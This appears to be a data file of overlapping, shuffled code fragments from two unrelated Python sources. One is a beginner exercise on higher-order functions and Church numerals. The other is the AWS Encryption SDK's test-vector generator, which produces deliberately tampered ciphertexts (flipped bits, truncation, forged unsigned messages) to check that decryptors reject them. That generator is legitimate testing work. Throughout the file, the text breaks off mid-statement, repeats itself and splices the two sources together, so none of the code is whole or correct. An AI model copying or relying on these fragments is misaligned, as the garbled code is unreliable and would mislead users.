add_three(5) 8 >>> make_repeater(triple, 5)(1) #", ">>> product(3, square) # 1^2 * 2^2 * 3^2 36", "x + 1 ###################### # Required Questions # ###################### def", "17, 19, 20, square) 16 \"\"\" \"*** YOUR CODE HERE", "# Yes, it makes sense to apply the function zero", "same as successor(successor(zero))\"\"\" \"*** YOUR CODE HERE ***\" return lambda", "a positive integer f -- a function that takes one", "three)) 5 \"\"\" \"*** YOUR CODE HERE ***\" return lambda", "for m + n, for Church numerals m and n.", "x identity = lambda x: x triple = lambda x:", "k = result + f(k), k + 1 return accumulate(add,0,n,f)", "four)) 12 \"\"\" \"*** YOUR CODE HERE ***\" return lambda", "to produce the term >>> product(3, identity) # 1 *", "to apply the function zero times! 5 \"\"\" \"*** YOUR", "\"\"\"Returns the sum of f(1) + ... + f(n). The", "= lambda x: x triple = lambda x: 3 *", "result, k = x,1 while k <= n: result,k =", "########################## # Just for fun Questions # ########################## def zero(f):", "numeral for m * n, for Church numerals m and", "6 >>> church_to_int(mul_church(three, four)) 12 \"\"\" \"*** YOUR CODE HERE", "compose1(h, g): \"\"\"Return a function f, such that f(x) =", "k + 1 return result def summation_using_accumulate(n, f): \"\"\"Returns the", "y: 2 * (x + y), 2, 3, square) 58", "for fun Questions # ########################## def zero(f): return lambda x:", "***\" return lambda f: lambda x: m(f)(n(f)(x)) def mul_church(m, n):", "= successor(two) def church_to_int(n): \"\"\"Convert the Church numeral n to", "Just for fun Questions # ########################## def zero(f): return lambda", "f(x) = h(g(x)).\"\"\" def f(x): return h(g(x)) return f def", "2*3 * 3*3 162 \"\"\" \"*** YOUR CODE HERE ***\"", "+ 4 + 5 15 >>> accumulate(add, 11, 5, identity)", "accumulate(mul, 2, 3, square) # 2 * 1^2 * 2^2", "commutative, associative function. >>> accumulate(add, 0, 5, identity) # 0", "* 3 * 3 * 3 * 3 * 1", "in a sequence. n -- a positive integer f --", "and n. >>> church_to_int(add_church(two, three)) 5 \"\"\" \"*** YOUR CODE", "identity) # 0 + 1 + 2 + 3 +", "accumulate(lambda x, y: 2 * (x + y), 2, 3," ]
[ "generates materials for an unsigned algorithm suite that includes the", "self.plaintexts.items()} ciphertext_writer = file_writer(os.path.join(root_dir, \"ciphertexts\")) test_scenarios = { decrypt_scenario_name: decrypt_scenario", "bit_index = divmod(bit, BITS_PER_BYTE) result = bytearray(ciphertext) result[byte_index] ^= 1", "every time. cache = LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache,", "on the given master key provider. \"\"\" self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider)", "need these imports when running the mypy checks pass SUPPORTED_VERSIONS", "attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name", "result def decrypt_materials(self, request): \"\"\"Thunks to the wrapped CMM\"\"\" return", "tag: \" + tampering_tag) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer,", "for the specific # language governing permissions and limitations under", "else None return cls( encryption_scenario=encryption_scenario, tampering_method=tampering_method, decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result,", "the provider info field on EDKS. THIS IS ONLY USED", "target_directory, json_indent=None): # type: (str, Optional[int]) -> None \"\"\"Process all", ") for length in range(1, len(ciphertext_to_decrypt)) ] class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering", "from typing import IO, Callable, Dict, Iterable, Optional # noqa", "== \"mutate\": return MutateTamperingMethod() if spec == \"half-sign\": return HalfSigningTamperingMethod()", "os.path.abspath(target_directory) root_writer = file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir,", "scenario specification. :param dict scenario: Scenario specification JSON :param KeysManifest", "type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS ) parent_dir = os.path.abspath(os.path.dirname(input_file.name)) reader = file_reader(parent_dir)", "signing_request = copy(request) signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result = self.wrapped_default_cmm.get_encryption_materials(signing_request) result.algorithm", "plaintexts=plaintexts ) except NotImplementedError: continue return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys, plaintexts=plaintexts, tests=tests)", "keys=keys, plaintexts=plaintexts, tests=tests) def run_and_write_to_dir(self, target_directory, json_indent=None): # type: (str,", "plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris = {name: plaintext_writer(name, plaintext) for", "permissions and limitations under the License. \"\"\" AWS Encryption SDK", "ANY KIND, either express or implied. See the License for", "scenario) pair\"\"\" ciphertext_name = str(uuid.uuid4()) ciphertext_uri = ciphertext_writer(ciphertext_name, ciphertext_to_decrypt) return", "tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec))", "materials_manager, new_provider_info): \"\"\"Create a new CMM that wraps a the", "{} flipped\".format(bit)), ) for bit in range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE)", "name to size in bytes :return: Mapping of plaintext name", "for name, scenario in self.tests.items() for decrypt_scenario_name, decrypt_scenario in scenario.run(", "of (ciphertext, result) pairs \"\"\" materials_manager = DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() )", "= [ MasterKeySpec.from_scenario(spec) for spec in scenario[\"decryption-master-keys\"] ] def decryption_master_key_provider_fn():", "encrypted_data_key.key_provider.key_info = self.new_provider_info return result def decrypt_materials(self, request): \"\"\"Thunks to", "Mapping of plaintext name to size in bytes :return: Mapping", "Reserved. # # Licensed under the Apache License, Version 2.0", "max_age=60.0, max_messages_encrypted=100, ) return [ self.run_scenario_with_new_provider_info( ciphertext_writer, generation_scenario, caching_cmm, new_provider_info", "= scenario[\"encryption-scenario\"] encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts) tampering = scenario.get(\"tampering\")", "cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests = {} for name, scenario in raw_manifest[\"tests\"].items(): try:", "attr.ib(validator=iterable_validator(list, six.string_types)) def __init__(self, new_provider_infos): \"\"\"Create a new instance for", "License is located at # # http://aws.amazon.com/apache2.0/ # # or", "\"ciphertexts\")) test_scenarios = { decrypt_scenario_name: decrypt_scenario for name, scenario in", "return: a list of (ciphertext, result) pairs. \"\"\" ciphertext_to_decrypt =", ":param str plaintext_uri: URI locating the written plaintext data for", "URI locating the written plaintext data for this scenario :return:", "= encryption_scenario.master_key_specs decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn result_spec = scenario.get(\"result\") result =", "scenario :return: Decrypt test scenario that describes the generated scenario", "in self.tests.items() for decrypt_scenario_name, decrypt_scenario in scenario.run( ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items()", "keys=keys, plaintexts=plaintexts ) except NotImplementedError: continue return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys, plaintexts=plaintexts,", "info on all EDKs.\"\"\" new_provider_infos = attr.ib(validator=iterable_validator(list, six.string_types)) def __init__(self,", "divmod(bit, BITS_PER_BYTE) result = bytearray(ciphertext) result[byte_index] ^= 1 << (BITS_PER_BYTE", "JSON files (optional: default is to write minified) \"\"\" root_dir", "given scenario, tampering with the input or the result. return:", "CMM that wraps a the given CMM.\"\"\" self.wrapped_cmm = materials_manager", "= attr.ib(validator=membership_validator(SUPPORTED_VERSIONS)) keys = attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests", "spec in scenario[\"decryption-master-keys\"] ] def decryption_master_key_provider_fn(): return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs) else:", "scenarios and write the resulting data and manifests to disk.", "self.wrapped_cmm = materials_manager self.new_provider_info = new_provider_info def get_encryption_materials(self, request): \"\"\"", "self.new_provider_info = new_provider_info def get_encryption_materials(self, request): \"\"\" Request materials from", "to forge an unsigned message from a decrypted signed message,", ":param decryption_master_key_specs: Iterable of master key specifications :type decryption_master_key_specs: iterable", "message decrypt test scenario. Handles serialization and deserialization to and", "attr.ib(validator=membership_validator(SUPPORTED_VERSIONS)) keys = attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests =", "result = self.wrapped_cmm.get_encryption_materials(request) for encrypted_data_key in result.encrypted_data_keys: encrypted_data_key.key_provider.key_info = self.new_provider_info", "result. return: a list of (ciphertext, result) pairs. \"\"\" tampering_materials_manager", "\"\"\"Create a new (name, decryption scenario) pair\"\"\" ciphertext_name = str(uuid.uuid4())", "mypy checks pass SUPPORTED_VERSIONS = (2,) class TamperingMethod: \"\"\"Base class", "self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self, request): \"\"\" Generate half-signing materials", "json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys = KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests = {}", "# ANY KIND, either express or implied. See the License", "of (ciphertext, result) pairs. \"\"\" master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn() # Use", "attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self, master_key_provider): \"\"\" Create a new CMM that", "suite.\" ) def decrypt_materials(self, request): \"\"\"Thunks to the wrapped default", "pass SUPPORTED_VERSIONS = (2,) class TamperingMethod: \"\"\"Base class for all", ":param dict scenario: Scenario specification JSON :param KeysManifest keys: Loaded", "name to randomly generated bytes :rtype: dict \"\"\" return {name:", "value\"\"\" tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result =", ") ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result: expected_result = generation_scenario.result else:", "class MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption SDK Decryption Message Generation manifest handler.", "a tampering specification\"\"\" if spec is None: return TamperingMethod() if", "all known encrypt test scenarios and write the resulting data", ":param dict plaintexts_specs: Mapping of plaintext name to size in", "for bit in range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE) ] @classmethod def", "\"\"\"Flip only the given bit in the given ciphertext\"\"\" byte_index,", "a list of (ciphertext, result) pairs. \"\"\" tampering_materials_manager = HalfSigningCryptoMaterialsManager(", "DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self, request): \"\"\" Generate half-signing materials by requesting", "names to :class:`MessageDecryptionGenerationManifest`s \"\"\" version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS)) keys = attr.ib(validator=attr.validators.instance_of(KeysManifest))", "specifications :type decryption_master_key_specs: iterable of :class:`MasterKeySpec` :param Callable decryption_master_key_provider_fn: :param", "Iterable, Optional # noqa pylint: disable=unused-import from awses_test_vectors.internal.mypy_types import (", "attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec)) decryption_master_key_provider_fn =", "generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that", "All Rights Reserved. # # Licensed under the Apache License,", "decryption_master_key_specs = [ MasterKeySpec.from_scenario(spec) for spec in scenario[\"decryption-master-keys\"] ] def", "in bytes :return: Mapping of plaintext name to randomly generated", "self.wrapped_default_cmm.get_encryption_materials(signing_request) result.algorithm = request.algorithm result.signing_key = None return result raise", "def __init__(self, master_key_provider): \"\"\" Create a new CMM that wraps", "SUPPORTED_VERSIONS = (2,) class TamperingMethod: \"\"\"Base class for all tampering", "tampering_method: Optional method used to tamper with the ciphertext :type", "MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts) tampering = scenario.get(\"tampering\") tampering_method = TamperingMethod.from_tampering_spec(tampering) decryption_method_spec", "max_messages_encrypted=100, ) return [ self.run_scenario_with_new_provider_info( ciphertext_writer, generation_scenario, caching_cmm, new_provider_info )", "of plaintext names to plaintext values :return: Loaded test scenario", "a the given CMM.\"\"\" self.wrapped_cmm = materials_manager self.new_provider_info = new_provider_info", "= request.algorithm result.signing_key = None return result raise NotImplementedError( \"The", "generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Unsigned message", "not use this file except in compliance with the License.", "MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario, ) from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario from awses_test_vectors.manifests.keys", "name, size in plaintexts_specs.items()} @classmethod def from_file(cls, input_file): # type:", "# type: (PLAINTEXTS_SPEC) -> Dict[str, bytes] \"\"\"Generate required plaintext values.", "result_spec else None return cls( encryption_scenario=encryption_scenario, tampering_method=tampering_method, decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn,", "def from_file(cls, input_file): # type: (IO) -> MessageDecryptionGenerationManifest \"\"\"Load from", "HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that generates materials for an unsigned", "generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes", ":param dict plaintexts: Mapping of plaintext names to plaintext values", "ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise ValueError(\"Unrecognized tampering method tag: \" + tampering_tag) #", "\"\"\"Create a new instance for a given new provider info", "ONLY USED TO CREATE INVALID MESSAGES and should never be", "request): \"\"\" Request materials from the wrapped CMM, and then", "file accompanying this file. This file is # distributed on", "the resulting data and manifests to disk. :param str target_directory:", "= attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types)) def __init__(self, materials_manager, new_provider_info): \"\"\"Create", "1 << (BITS_PER_BYTE - bit_index - 1) return bytes(result) class", "key from teh result. \"\"\" if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request", "def from_scenario(cls, scenario, keys, plaintexts): \"\"\"Load from a scenario specification.", "ciphertext_writer, generation_scenario, caching_cmm, new_provider_info ) for new_provider_info in self.new_provider_infos ]", "= self.wrapped_default_cmm.get_encryption_materials(signing_request) result.algorithm = request.algorithm result.signing_key = None return result", "\"\"\" result = self.wrapped_cmm.get_encryption_materials(request) for encrypted_data_key in result.encrypted_data_keys: encrypted_data_key.key_provider.key_info =", "to write all output :param int json_indent: Number of spaces", "None \"\"\"Process all known encrypt test scenarios and write the", "plaintext_writer(name, plaintext) for name, plaintext in self.plaintexts.items()} ciphertext_writer = file_writer(os.path.join(root_dir,", "ciphertext_writer = file_writer(os.path.join(root_dir, \"ciphertexts\")) test_scenarios = { decrypt_scenario_name: decrypt_scenario for", "Framework feature #0006 AWS Encryption SDK Decrypt Message Generation. :param", "# Licensed under the Apache License, Version 2.0 (the \"License\").", "SDK Decrypt Message Generation. :param int version: Version of this", "self.run_scenario_with_new_provider_info( ciphertext_writer, generation_scenario, caching_cmm, new_provider_info ) for new_provider_info in self.new_provider_infos", "this file except in compliance with the License. A copy", "result_spec = scenario.get(\"result\") result = MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else", ") class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that modifies the provider", "therefore this is an important case for ESDKs to reject.", "( dictionary_validator, file_reader, file_writer, iterable_validator, membership_validator, validate_manifest_type, ) from awses_test_vectors.manifests.full_message.decrypt", "key\" ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager):", "#0006 AWS Encryption SDK Decrypt Message Generation. \"\"\" import json", "new_provider_info) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Incorrect encrypted data", "indent JSON files (optional: default is to write minified) \"\"\"", "actually need these imports when running the mypy checks pass", "(IO) -> MessageDecryptionGenerationManifest \"\"\"Load from a file containing a full", "written plaintext data for this scenario :return: Decrypt test scenario", "file_writer(os.path.join(root_dir, \"ciphertexts\")) test_scenarios = { decrypt_scenario_name: decrypt_scenario for name, scenario", "keys, plaintexts): \"\"\"Load from a scenario specification. :param dict scenario:", "generated bytes :rtype: dict \"\"\" return {name: os.urandom(size) for name,", "decrypt_scenario in scenario.run( ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() } decrypt_manifest = MessageDecryptionManifest(", "from awses_test_vectors.manifests.full_message.decrypt import ( DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario, ) from", "on all EDKs.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario,", "provider info on all EDKs.\"\"\" new_provider_infos = attr.ib(validator=iterable_validator(list, six.string_types)) def", "ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)), ) for bit in", "file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris = {name: plaintext_writer(name, plaintext) for name, plaintext", "@classmethod def from_scenario(cls, scenario, keys, plaintexts): \"\"\"Load from a scenario", "message with a single bit flipped, for every possible bit.\"\"\"", "result=result, ) def run(self, ciphertext_writer, plaintext_uri): \"\"\"Run this scenario, writing", "scenario.get(\"result\") result = MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else None return", "manifest :return: Loaded manifest :rtype: MessageEncryptionManifest \"\"\" raw_manifest = json.load(input_file)", "run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri): \"\"\" Run a given scenario, tampering", "return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated at byte {}\".format(length)), )", "\"awses-decrypt-generate\" @staticmethod def _generate_plaintexts(plaintexts_specs): # type: (PLAINTEXTS_SPEC) -> Dict[str, bytes]", "default CMM\"\"\" return self.wrapped_default_cmm.decrypt_materials(request) @attr.s class MessageDecryptionTestScenarioGenerator(object): # pylint: disable=too-many-instance-attributes", "str target_directory: Directory in which to write all output :param", "describes the matching decrypt scenario. :param callable ciphertext_writer: Callable that", "Encryption parameters :param tampering_method: Optional method used to tamper with", "IO, Callable, Dict, Iterable, Optional # noqa pylint: disable=unused-import from", "Message Generation manifest handler. Described in AWS Crypto Tools Test", "encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts) tampering = scenario.get(\"tampering\") tampering_method =", "scenario, keys, plaintexts): \"\"\"Load from a scenario specification. :param dict", "ciphertext_writer, generation_scenario, plaintext_uri): \"\"\" Run a given scenario, tampering with", "generating a new data key every time. cache = LocalCryptoMaterialsCache(10)", "the specific # language governing permissions and limitations under the", "in which to write all output :param int json_indent: Number", "a specific new provider info value\"\"\" tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info)", "decrypt_materials(self, request): \"\"\"Thunks to the wrapped default CMM\"\"\" return self.wrapped_default_cmm.decrypt_materials(request)", "all output :param int json_indent: Number of spaces to indent", "good message at every byte (except zero).\"\"\" # pylint: disable=R0201", ") def decrypt_materials(self, request): \"\"\"Thunks to the wrapped default CMM\"\"\"", "instance for a given new provider info value.\"\"\" self.new_provider_infos =", "provider info: \" + new_provider_info ) return generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt,", "if tampering_tag == \"change-edk-provider-info\": return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise ValueError(\"Unrecognized tampering method", "byte {}\".format(length)), ) for length in range(1, len(ciphertext_to_decrypt)) ] class", "= {name: plaintext_writer(name, plaintext) for name, plaintext in self.plaintexts.items()} ciphertext_writer", "pylint: disable=unused-import from awses_test_vectors.internal.mypy_types import ( # noqa pylint: disable=unused-import", "from awses_test_vectors.internal.util import ( dictionary_validator, file_reader, file_writer, iterable_validator, membership_validator, validate_manifest_type,", "imitating what a malicious decryptor without encryption permissions might do,", "scenario.get(\"tampering\") tampering_method = TamperingMethod.from_tampering_spec(tampering) decryption_method_spec = scenario.get(\"decryption-method\") decryption_method = DecryptionMethod(decryption_method_spec)", "\"\"\"Thunks to the wrapped default CMM\"\"\" return self.wrapped_default_cmm.decrypt_materials(request) @attr.s class", "decryption_master_key_provider_fn(): return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs) else: decryption_master_key_specs = encryption_scenario.master_key_specs decryption_master_key_provider_fn =", "It is imitating what a malicious decryptor without encryption permissions", "encrypted_data_key in result.encrypted_data_keys: encrypted_data_key.key_provider.key_info = self.new_provider_info return result def decrypt_materials(self,", "ImportError: from aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite from awses_test_vectors.manifests.master_key import", "cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys, plaintexts=plaintexts, tests=tests) def run_and_write_to_dir(self, target_directory, json_indent=None): # type:", "return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs) else: decryption_master_key_specs = encryption_scenario.master_key_specs decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn", "a message with a single bit flipped, for every possible", "INVALID MESSAGES and should never be used in production! \"\"\"", "cover # We only actually need these imports when running", "Loaded test scenario :rtype: MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec = scenario[\"encryption-scenario\"] encryption_scenario", "3.5.1 have incompatible typing modules from typing import IO, Callable,", "\"change-edk-provider-info\": return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise ValueError(\"Unrecognized tampering method tag: \" +", "dict scenario: Scenario specification JSON :param KeysManifest keys: Loaded keys", "+ tampering_tag) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri):", "test_scenarios = { decrypt_scenario_name: decrypt_scenario for name, scenario in self.tests.items()", "= self.wrapped_cmm.get_encryption_materials(request) for encrypted_data_key in result.encrypted_data_keys: encrypted_data_key.key_provider.key_info = self.new_provider_info return", "the matching decrypt scenario. :param callable ciphertext_writer: Callable that will", "# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights", "aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager from awses_test_vectors.internal.defaults import", "(PLAINTEXTS_SPEC) -> Dict[str, bytes] \"\"\"Generate required plaintext values. :param dict", "json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris = {name: plaintext_writer(name,", "Version of this manifest :param KeysManifest keys: Loaded keys :param", "\"\"\" return {name: os.urandom(size) for name, size in plaintexts_specs.items()} @classmethod", "# # http://aws.amazon.com/apache2.0/ # # or in the \"license\" file", "dict \"\"\" return {name: os.urandom(size) for name, size in plaintexts_specs.items()}", "\"\"\"Tampering method that produces a message with a single bit", "generation_scenario.result: expected_result = generation_scenario.result else: expected_result = MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext", "pragma: no cover # We only actually need these imports", "under the License. \"\"\" AWS Encryption SDK Decrypt Message Generation", "that truncates a good message at every byte (except zero).\"\"\"", "output :param int json_indent: Number of spaces to indent JSON", "generation_scenario.result else: expected_result = MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return [", "context. THIS IS ONLY USED TO CREATE INVALID MESSAGES and", "else: decryption_master_key_specs = encryption_scenario.master_key_specs decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn result_spec = scenario.get(\"result\")", "generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated at byte {}\".format(length)),", "master key specifications :type decryption_master_key_specs: iterable of :class:`MasterKeySpec` :param Callable", ":param dict tests: Mapping of test scenario names to :class:`MessageDecryptionGenerationManifest`s", "INVALID MESSAGES and should never be used in production! It", "new provider info value.\"\"\" self.new_provider_infos = new_provider_infos @classmethod def from_values_spec(cls,", "tampering methods.\"\"\" @classmethod def from_tampering_spec(cls, spec): \"\"\"Load from a tampering", "return: a list of (ciphertext, result) pairs \"\"\" materials_manager =", "the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\" ) def decrypt_materials(self, request): \"\"\"Thunks", "MessageDecryptionGenerationManifest \"\"\"Load from a file containing a full message encrypt", "changes the provider info on all EDKs.\"\"\" new_provider_infos = attr.ib(validator=iterable_validator(list,", "key with a public key\" ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt,", "plaintext in self.plaintexts.items()} ciphertext_writer = file_writer(os.path.join(root_dir, \"ciphertexts\")) test_scenarios = {", "= attr.ib(validator=iterable_validator(list, six.string_types)) def __init__(self, new_provider_infos): \"\"\"Create a new instance", "2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. #", "with a single bit flipped, for every possible bit.\"\"\" #", "encryption_scenario: Encryption parameters :param tampering_method: Optional method used to tamper", "encryption_scenario.master_key_provider_fn result_spec = scenario.get(\"result\") result = MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec", "raise NotImplementedError( \"The half-sign tampering method is only supported on", "import ( # noqa pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC, ) except", "a single bit flipped, for every possible bit.\"\"\" # pylint:", "tampering_values_spec),) = spec.items() if tampering_tag == \"change-edk-provider-info\": return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise", ") ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Unsigned message using", "handler. Described in AWS Crypto Tools Test Vector Framework feature", "\"The half-sign tampering method is only supported on the \"", ":class:`MasterKeySpec` :param Callable decryption_master_key_provider_fn: :param result: \"\"\" encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario))", "scenario: decryption_master_key_specs = [ MasterKeySpec.from_scenario(spec) for spec in scenario[\"decryption-master-keys\"] ]", "a decrypted signed message, and therefore this is an important", "= MessageDecryptionTestResult.expect_error( \"Unsigned message using a data key with a", "values_spec): \"\"\"Load from a tampering parameters specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec) #", "Generation. :param int version: Version of this manifest :param KeysManifest", "This file is # distributed on an \"AS IS\" BASIS,", "cls( encryption_scenario=encryption_scenario, tampering_method=tampering_method, decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, ) def run(self,", "to disk. :param str target_directory: Directory in which to write", "new_provider_info): \"\"\"Create a new CMM that wraps a the given", "import DefaultCryptoMaterialsManager from awses_test_vectors.internal.defaults import ENCODING from awses_test_vectors.internal.util import (", "SDK Decrypt Message Generation. \"\"\" import json import os import", "and from manifest specs. :param MessageEncryptionTestScenario encryption_scenario: Encryption parameters :param", "ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\"", "deserialization to and from manifest specs. :param MessageEncryptionTestScenario encryption_scenario: Encryption", "AWS Encryption SDK Decrypt Message Generation. \"\"\" import json import", "request): \"\"\"Thunks to the wrapped CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE =", "an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF #", "Tools Test Vector Framework feature #0006 AWS Encryption SDK Decrypt", "os import uuid from copy import copy import attr import", "with the ciphertext :type tampering_method: :class:`TamperingMethod` :param decryption_method: :param decryption_master_key_specs:", "\"\"\" wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types)) def __init__(self, materials_manager,", "\"\"\"Thunks to the wrapped CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8", "input_file: File object for file containing JSON manifest :return: Loaded", "typing modules from typing import IO, Callable, Dict, Iterable, Optional", "tampering = scenario.get(\"tampering\") tampering_method = TamperingMethod.from_tampering_spec(tampering) decryption_method_spec = scenario.get(\"decryption-method\") decryption_method", "pairs. \"\"\" tampering_materials_manager = HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager)", "MessageDecryptionTestScenarioGenerator)) type_name = 